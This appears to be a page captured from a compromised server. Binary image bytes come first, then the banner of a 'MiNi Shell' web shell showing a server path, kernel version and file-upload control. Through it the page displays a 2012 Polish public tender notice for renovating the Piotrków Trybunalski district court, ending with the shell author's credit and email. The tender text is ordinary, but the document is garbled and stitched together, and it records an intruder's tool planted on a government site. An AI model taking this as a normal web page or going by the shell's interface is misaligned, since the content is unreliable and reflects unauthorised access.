JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120523/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120523/114667-N-2012.html

<p class="kh_header"><b>Piotrków Trybunalski: Przebudowa i remont części pomieszczeń w budynku Sądu Okręgowego w Piotrkowie Trybunalskim ul. Słowackiego 5</b><br>
<b>Numer ogłoszenia: 114667 - 2012; data zamieszczenia: 23.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Sąd Okręgowy , ul. Słowackiego 5, 97-300 Piotrków Trybunalski, woj. łódzkie, tel. 044 6494101 do 03, faks 044 6478919.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Organ kontroli państwowej lub ochrony prawa, sąd lub trybunał.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa i remont części pomieszczeń w budynku Sądu Okręgowego w Piotrkowie Trybunalskim ul. Słowackiego 5.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest przebudowa i remont części pomieszczeń w budynku Sądu Okręgowego w Piotrkowie Trybunalskim ul. Słowackiego 5, zgodnie z załączoną dokumentacją projektową tj. : 

Załącznik nr 7 do SIWZ      Specyfikacja techniczna wykonania i odbioru robót budowlanych,	
Załącznik nr 8  do SIWZ         Dokumentacja projektowa, 
Załącznik nr 9 do SIWZ        Przedmiary robót (złączony pomocniczo) 
Załącznik nr 10 do SIWZ        Pozwolenie na budowę 

Wykonawca zobowiązany jest przed złożeniem oferty do zapoznania się z pomieszczeniami gdzie prowadzone będą prace remontowe. 

Zakres zamówienia obejmuje wykonanie wszystkich robót budowlanych objętych wymienioną wyżej dokumentacją oraz wykonanie w ramach ceny ryczałtowej  innych niezbędnych czynności  pomocniczych  w tym:
- zapewnienia bezpieczeństwa pracownikom i interesantom sądu na czas prowadzenia robót,
- składowania i wywozu odpadów powstających w trakcie realizacji robót,
- wyniesienia mebli biurowych i sądowych z remontowanych pomieszczeń i ponownego ich wniesienia po zakończeniu prac remontowych, 
- po zakończeniu remontu, posprzątania pomieszczeń w których prowadzone były prace remontowe.

Zamawiający zastrzega, że prace remontowe, Wykonawca zobowiązany będzie prowadzić                     w godzinach pracy sądu, a w wyjątkowych przypadkach np. wyburzenia, przekucia, prace powodujące hałas, poza godzinami pracy sądu. W takim przypadku Wykonawca powiadomi pisemnie Zamawiającego o konieczności wykonania takich robót z co najmniej 2 dniowym wyprzedzeniem.

Wykonawca zobowiązany będzie do przekazania przed rozpoczęciem prac do Oddziału Inwestycji i Remontów Sądu Okręgowego w Piotrkowi Trybunalskim:  
- ogólnej listy osób (pracowników) którzy będą wykonywać prace remontowe, wraz                         z   podaniem numerów i serii dowodów osobistych. W przypadku zmiany osób w trakcie obowiązywania umowy, należy przedłożyć Zamawiającemu uaktualnioną listę. 
- każdorazowo z co najmniej 2 dniowym wyprzedzeniem,  przed rozpoczęciem prac wykonywanych poza godzinami pracy sądu, listy osób (pracowników) którzy będą wykonywać prace remontowe.  

Roboty powinny być wykonane zgodnie z ww. opisem oraz zaleceniami Zamawiającego                                i inspektora nadzoru inwestorskiego. 

Zakres poszczególnych etapów robót, został określony w dokumentacji projektowej tj. rysunek               nr 02 i 03.  

Wykonawca którego oferta zostanie wybrana, zobowiązany będzie do przedłożenia Zamawiającemu w terminie 10 dni od dnia zawarcia umowy, szczegółowy harmonogram rzeczowo- finansowy  realizacji robót. 
Wymagane jest aby Wykonawca w harmonogramie rzeczowo- finansowy uwzględnił sukcesywność wykonywania etapów prac w uzgodnieniu z Zamawiającym. 

Zamawiający informuje ze względu na to, że prace remontowe prowadzone będą w wielu pomieszczeniach usytuowanych w różnych miejscach funkcjonującego sądu, nie będzie możliwe wskazanie miejsca poboru wody i energii  elektrycznej. 
Wykonawca zobowiązany będzie w cenie ofertować nie uwzględniać kosztów zwianych                            z poborem energii elektrycznej i wody. 

2. Kody CPV: 45262700-8 Przebudowa budynków 
                     45453000-7 Roboty remontowe i renowacyjne 

3. Wymagany okres gwarancji wynosi 36 miesięcy od dnia protokolarnego odebrania przez Zamawiającego poszczególnych etapów robót. 

4. Zamawiający nie przewiduje udzielenia zaliczek na poczet wykonania zamówienia.
       
5. Zamawiający nie dopuszcza możliwości składania ofert częściowych i wariantowych.  

6. Przedmiotem niniejszego postępowania nie jest zawarcie umowy ramowej. 
7. Zamawiający dopuszcza możliwość udzielenia zamówień uzupełniających do wysokości 50 % wartości zamówienia. 
8.  Zamawiający nie przewiduje przy wyborze oferty zastosowania aukcji elektronicznej.
9. Zamawiający nie przewiduje ustanowienia dynamicznego systemu zakupów. 
10. Informacja na temat możliwości powierzenia przez wykonawcę wykonania części lub całości zamówienia podwykonawcom:
Wykonawca może powierzyć wykonanie części lub całości niniejszego zamówienia podwykonawcom. W takim przypadku zobowiązany jest do wykazania w formularzu ofertowym części zamówienia, której wykonanie zamierza powierzyć podwykonawcom.
11. Wymagania stawiane Wykonawcy:
11.1 Wykonawca jest odpowiedzialny za jakość, zgodność z warunkami technicznymi                                      i jakościowymi opisanymi dla przedmiotu zamówienia.  
11.2   Wymagana jest należyta staranność przy realizacji zobowiązań umowy,  
11.3 Ustalenia i decyzje dotyczące wykonywania zamówienia uzgadniane będą przez zamawiającego z ustanowionym przedstawicielem wykonawcy.  
11.4 Określenie przez Wykonawcę telefonów kontaktowych i numerów fax. oraz innych ustaleń niezbędnych dla sprawnego i terminowego wykonania zamówienia.  
11.5 Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawcę podczas wykonywania przedmiotu zamówienia.  

12. Jeśli w dokumentacji projektowej zostały wskazane znaki towarowe, patenty  lub pochodzenie urządzeń i materiałów należy je traktować, jako propozycje projektanta.
Zamawiający dopuszcza możliwość złożenia ofert równoważnych w zakresie zaproponowanych materiałów i urządzeń wskazanych w dokumentacji projektowej, w tym w  specyfikacji technicznej wykonania i odbioru robot  oraz przedmiarze robót. 
Zamawiający dopuszcza zastosowanie innych materiałów i urządzeń niż podane w dokumentacji projektowej pod warunkiem zapewnienia parametrów nie gorszych niż określone w dokumentacji projektowej 
Zgodnie z art. 30 ust. 5 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych Wykonawca, który powołuje się na rozwiązania równoważne, jest obowiązany wykazać, że oferowane przez niego roboty budowlane spełniają wymagania określone przez Zamawiającego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający dopuszcza możliwość udzielenia zamówień uzupełniających do wysokości 50 % wartości zamówienia, związanych z przedmiotem zamówienia m.in. przekucia ścian, domurowania, rozkucia, przemurowania.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.26.27.00-8, 45.45.30.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.01.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych uprawnień.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca zobowiązany jest wykazać, że dysponuje w celu realizacji niniejszego zamówienia  następującą osobą:

a)	kierownik budowy  
Osoba posiadająca wykształcenie techniczne  oraz uprawienia do sprawowania samodzielnych funkcji w budownictwie do kierowania robotami budowlanymi w specjalności konstrukcyjno - budowlanej bez ograniczeń albo odpowiadające im ważne uprawnienia budowlane w zakresie pełnionej funkcji, które zostały wydane na podstawie wcześniej obowiązujących przepisów i należąca do właściwej Izby 
Samorządu Zawodowego (zgodnie z Rozporządzeniem Ministra Transportu i Budownictwa z dnia 28.4.2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie [Dz. U. z dnia 16.5.2006 r. Nr 83 poz. 578], przepisami ustawy Prawo Budowlane i ustawy z 15.12.2000 r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów [Dz. U. z 2001 r. Nr 5 poz. 42 z późn. zm.])

oraz

posiadająca kwalifikację o których mowa w § 24 Rozporządzenia Ministra Kultury i Dziedzictwa Narodowego z dnia 27 lipca 2011 r. ( Dz.U. z 2011 r. Nr 165 poz. 987) 

W celu wykazania spełnienia tego warunku Wykonawca zobowiązany jest złożyć
a) Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia (odpowiedzialnych za kierowanie robotami budowlanymi), wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami  - załącznika  nr 4 do SIWZ . 

b) Oświadczenie że osoba która będzie kierowała robotami budowlanymi spełnia wymagania 
o których mowa w § 24 Rozporządzenia Ministra Kultury i Dziedzictwa Narodowego z dnia 27 lipca 2011 r. ( Dz.U. z 2011 r. Nr 165 poz. 987) 
- załącznika  nr 5 do SIWZ. 
Ocena tego warunku dokonywana będzie w oparciu o treść ww. dokumentów.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)  Formularz ofertowy - wypełniony i podpisany przez wykonawcę - załącznik nr 1  do SIWZ

b) Oświadczenie o spełnieniu warunków udziału w postępowaniu z art. 22 ust. 1 Prawa zamówień publicznych - załącznik nr 2 do SIWZ
 
c) Dokumenty potwierdzające posiadanie uprawnień/pełnomocnictw osób składających ofertę, 
o ile nie wynika to z przedstawionych dokumentów rejestrowych.
 
d) Oświadczenie że osoba która będzie kierowała robotami budowlanymi spełnia wymagania o których mowa w § 24 Rozporządzenia Ministra Kultury i Dziedzictwa Narodowego z dnia 27 lipca 2011 r. ( Dz.U. z 2011 r. Nr 165 poz. 987) 
- załącznika  nr 5 do SIWZ .</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmian zawartej umowy w następujących przypadkach:
a)	Zamawiający przewiduje możliwość zastosowania materiałów  zamiennych jeżeli jest to uzasadnione ze względów technologicznych. Wykonawca może wykonać roboty zamienne jedynie po zatwierdzeniu ich wykonania przez Zamawiającego i inspektora nadzoru inwestorskiego.  Roboty zamienne zostaną wyłączone z rozliczenia ryczałtowego a ich rozliczenie odbędzie się na podstawie kosztorysu różnicowego sporządzonego z uwzględnieniem stawek cenowych zastosowanych w pomocniczym kosztorysie ofertowym Wykonawcy. 
W szczególnie uzasadnionych przypadkach żądanie i zamówienie  robót zamiennych będzie stanowiło dla Wykonawcy podstawę do wystąpienia z żądaniem przedłużenia terminu realizacji robót. 
Liczba dni przedłużających termin wykonania umowy, zostanie każdorazowo uzgodniona                      z Zamawiającym i inspektorem nadzoru przed formalnoprawnym zamówieniem robót zamiennych. 

b)	Zamawiający przewiduje możliwości zmiany treści umowy w przypadku zmiany przepisów podatkowych, które będą powodowały zmianę stawki VAT. W takim przypadku podatek Vat naliczony zostanie według nowej stawki i w tym zakresie spowoduje zmianę wynagrodzenia brutto.
c)	Zamawiający przewiduje możliwość zmiany  terminu wykonania zamówienia  w przypadku wystąpienia zdarzeń do zaistnienia, których Wykonawca się nie przyczynił,  których skutki uniemożliwiły wykonanie przedmiotowej umowy zgodnie z pierwotnym terminem m.in.:
- wystąpi zmiana przepisów prawnych istotnych dla realizacji przedmiotu umowy i mająca wpływ na zakres lub termin wykonania przedmiotu zamówienia,
- wystąpi przedłużenie czasu trwania procedur administracyjnych, mających wpływ na termin wykonania przedmiotu zamówienia,
-  działania siły wyższej, uniemożliwiającej wykonanie umowy w określonym pierwotnie terminie;
- błędów w dokumentacji projektowej, w oparciu o którą wykonywane jest zamówienie i konieczności naniesienia przez projektanta poprawek lub zmian w projekcie, które mają wpływ na termin realizacji zamówienia;
- jeżeli zostaną ujawnione elementy infrastruktury technicznej, będące przyczyną kolizji, których usunięcie będzie powodowało prace dotychczas nieprzewidziane,
- opóźnienia w oddaniu budynku do użytku w ramach trwającej inwestycji pn Rozbudowa                                              i przebudowa budynku dla Sądu Rejonowego w Piotrkowie Trybunalskim, przy ul. Słowackiego 5, co skutkowało będzie niemożnością przeniesienia pracowników z remontowanych pomieszczeń, przez co Wykonawca nie będzie mógł rozpocząć prac remontowych.  
W takiej sytuacji termin wykonania umowy zostanie wydłużony proporcjonalnie do ilości dni wynikających z opóźnienia w udostępnieniu pomieszczeń do remontu. 
  
d) Zamawiający przewiduje możliwość zlecenia wykonania zamówień dodatkowych w przypadku spełnienia przesłanek określonych w art. 67  Ustawy Prawo zamówień publicznych. Wynagrodzenie  za zamówienie dodatkowe, będzie miało charakter wynagrodzenia kosztorysowego.

 UWAGI 
Na żądanie Zamawiającego, Wykonawca zobowiązany jest wykonać roboty zamienne ( w stosunku do robót przewidzianych w projekcie). 
Rozliczenie ewentualnych robót zamiennych nastąpi kosztorysem różnicowym,  który stanowić będzie różnice pomiędzy kosztorysem ofertowym dla robót podstawowych a kosztorysem robót zamiennych. O konieczności wykonania robót zamiennych Wykonawca pisemnie zawiadamia Zamawiającego. W przypadku uzyskania zgody na wykonie robót zamiennych, Wykonawca w terminie 7 dni od dnia otrzymania zgody, przedkłada Zamawiającemu kosztorys różnicowy. Po sprawdzeniu przez inspektora nadzoru kosztorysu różnicowego oraz po jego zatwierdzeniu przez Zamawiającego strony dokonują zmiany umowy. 

Roboty zamienne mogą być także wykonane na wniosek wykonawcy po uprzednim uzgodnieniu z Zamawiającym, według zasad jak dla robót zamiennych na żądanie Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.piotrkow-tryb.so.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Sąd Okręgowy w Piotrkowie Trybunalskim 
Ul. Słowackiego 5
97-300 Piotrków Trybunalski

Oddział Finansowy  pokój nr 114.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.06.2012 godzina 09:00, miejsce: Sąd Okręgowy w Piotrkowie Trybunalskim 
Ul. Słowackiego 5
97-300 Piotrków Trybunalski

Oddział Finansowy  pokój nr 114.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com